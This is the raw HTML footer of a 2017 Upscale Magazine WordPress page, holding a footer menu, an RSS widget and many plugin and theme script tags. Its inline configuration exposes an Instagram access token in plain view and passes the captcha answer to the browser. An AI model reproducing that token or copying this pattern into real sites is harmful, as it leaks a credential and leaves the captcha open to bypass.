</p><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1508704713" /><input type="hidden" name="_mc4wp_form_id" value="6828" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /></div><div class="mc4wp-response"></div></form><!-- / MailChimp for WordPress Plugin --></div>
						<!-- end SIDEBAR WIDGET -->

                        </div>

					</div>

					<div class="col-md-4">

                    <div class="col-md-12">

						<!-- start SIDEBAR WIDGET -->

						<div id="rss-2" class="wa-widget wa-widget-footer widget_rss"><div class="wa-widget-title"><h2 class="page-title-small"><span><a class="rsswidget" href="http://theybf.com/"><img class="rss-widget-icon" style="border:0" width="14" height="14" src="http://upscalemagazine.com/wp-includes/images/rss.png?x41646" alt="RSS" /></a> <a class="rsswidget" href="http://theybf.com/">TheYBF.com</a></span></h2></div><ul><li><a class='rsswidget' href='http://theybf.com/2017/10/22/baller-bits-lonzo-ball-silences-the-haters-drops-%E2%80%98super-saiyan%E2%80%99-track-demarcus-cousins'>YBF SPORTS: Jemele Hill Returns To ESPN Saying She DESERVED Suspension + Lonzo Ball Silences The Haters, Drops New Track + DeMarcus Cousins Addresses $25K &#039;F*** You&#039; Fine</a></li></ul></div>
						<!-- end SIDEBAR WIDGET -->

                        </div>

					</div>

					<!--<div class="col-md-4">

						<!-- start SIDEBAR WIDGET -->

						
							&nbsp;

						
						<!-- end SIDEBAR WIDGET 

					</div>-->

				</div>

			</div>

		</div>

		<!-- footer ends -->

		

		
		<!-- menu footer -->

		<div id="menu_footer" class="full_100">

			<div class="container">

				<div class="row">

					<div class="col-md-12">

						<div class="text-center">

							<div class="menu-footer-manu-container"><ul id="menu-footer-manu" class="wa-ul-menu-footer"><li id="menu-item-130" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-130"><a href="http://upscalemagazine.com/wp-content/uploads/2017/10/upscalemediakit2018.pdf?x41646">Media Kit</a></li>
<li id="menu-item-83" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-83"><a href="http://upscalemagazine.com/">UPSCALE</a></li>
<li id="menu-item-82" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-82"><a href="http://upscalemagazine.com/about/">About</a></li>
<li id="menu-item-86" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-86"><a href="http://upscalemagazine.com/category/lifestyle/">LIFESTYLE</a></li>
<li id="menu-item-128" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-128"><a href="http://upscalemagazine.com/category/entertainment/">ENTERTAINMENT</a></li>
<li id="menu-item-84" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84"><a href="http://upscalemagazine.com/category/updates/">NEWS</a></li>
<li id="menu-item-87" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-87"><a href="http://upscalemagazine.com/category/travel/">TRAVEL</a></li>
<li id="menu-item-81" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-81"><a href="http://upscalemagazine.com/contact/">Contact</a></li>
<li id="menu-item-80" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-80"><a href="http://upscalemagazine.com/careers/">Careers</a></li>
</ul></div>
						</div>

					</div>

				</div>	

			</div>

		</div>

		<!-- menu footer ends -->

		
		

		
		<!-- copyright -->

		<div id="copyright" class="full_100">

			<div class="container">

				<div class="row">

					<div class="col-md-12">

						<div class="text-center">

							© 2016 Upscale Communications. All Rights Reserved.  <a href="http://upscalemagazine.com/privacy-policy/"> Privacy Policy </a>  | <a href="http://upscalemagazine.com/sitemap/">  Site Map </a>
						</div>

					</div>

				</div>	

			</div>

		</div>

		<!-- copyright ends -->

		
		

	</div>

	<!-- footer section ends -->

	





			<script>
		( function ( body ) {
			'use strict';
			body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' );
		} )( document.body );
		</script>
			<div style="display:none">
	<div class="grofile-hash-map-1c5cafb56f0ac29b613664ff3649eb63">
	</div>
	</div>
<script type='text/javascript'> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done"}};/* ]]> */ </script><script type="text/javascript">(function() {function addEventListener(element,event,handler) {
	if(element.addEventListener) {
		element.addEventListener(event,handler, false);
	} else if(element.attachEvent){
		element.attachEvent('on'+event,handler);
	}
}function maybePrefixUrlField() {
	if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) {
		this.value = "http://" + this.value;
	}
}

var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]');
if( urlFields && urlFields.length > 0 ) {
	for( var j=0; j < urlFields.length; j++ ) {
		addEventListener(urlFields[j],'blur',maybePrefixUrlField);
	}
}/* test if browser supports date fields */
var testInput = document.createElement('input');
testInput.setAttribute('type', 'date');
if( testInput.type !== 'date') {

	/* add placeholder & pattern to all date fields */
	var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]');
	for(var i=0; i<dateFields.length; i++) {
		if(!dateFields[i].placeholder) {
			dateFields[i].placeholder = 'YYYY-MM-DD';
		}
		if(!dateFields[i].pattern) {
			dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])';
		}
	}
}

})();</script>
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/upscalemagazine.com\/prestigious-elegant-regal-welcome-desoto-sotherly\/":9316};
	</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-includes/js/jquery/ui/core.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-includes/js/jquery/ui/widget.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-includes/js/jquery/ui/mouse.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-includes/js/jquery/ui/sortable.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-includes/js/comment-reply.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/jetpack/modules/photon/photon.js?x41646'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sb_instagram_js_options = {"sb_instagram_at":"762354362.3a81a9f.7fb520f350d34a5dbb3960df9572de86"};
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js?x41646'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201742'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"http:\/\/upscalemagazine.com\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"http:\/\/upscalemagazine.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?x41646'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"http:\/\/upscalemagazine.com\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?x41646'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"http:\/\/upscalemagazine.com\/?wc-ajax=%%endpoint%%","fragment_name":"wc_fragments_2d7569bc6a18f73f777979088bb36c67"};
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?x41646'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Octaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/jetpack/modules/wpgroho.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.easing.1.3.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.cycle2.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.cycle2.center.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.magnific-popup.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jflickrfeed.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.sharrre.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.marquee.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/imagesloaded.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.wa.twitter.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.mb.YTPlayer.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.colorbox-min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.placeholder.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/jquery.validate.min.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/hoverIntent.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/superfish.min.js?x41646'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ponzi_variable = {"ajaxurl":"http:\/\/upscalemagazine.com\/wp-admin\/admin-ajax.php","templateurl":"http:\/\/upscalemagazine.com\/wp-content\/themes\/ponzi","nonce":"c35a7d11a0","email_success":"Email has been succesfully sent","captcha_placeholder":"9 + 1 = ?","captcha_answer":"10","a1":"9","a2":"1","rss2_url":"http:\/\/upscalemagazine.com\/","flickr_id":"111623889@N03"};
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/themes/ponzi/js/custom.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/?wa_custom_var=wa_js&#038;ver=1.0.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"http:\/\/upscalemagazine.com\/wp-admin\/admin-ajax.php","nonce":"ba4689aac8","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/upscalemagazine.com\/wp-login.php?redirect_to=http%3A%2F%2Fupscalemagazine.com%2Fprestigious-elegant-regal-welcome-desoto-sotherly%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel.js?x41646'></script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-includes/js/wp-embed.min.js?x41646'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var mc4wp_forms_config = [];
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?x41646'></script>
<!--[if lte IE 9]>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?x41646'></script>
<![endif]-->
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://upscalemagazine.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?x41646'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201742.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:5.4',blog:'134049455',post:'9316',tz:'-4',srv:'upscalemagazine.com'} ]);
	_stq.push([ 'clickTrackerInit', '134049455', '9316' ]);
</script>

</body>

</html>
<!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

 Served from: upscalemagazine.com @ 2017-10-22 16:38:34 by W3 Total Cache -->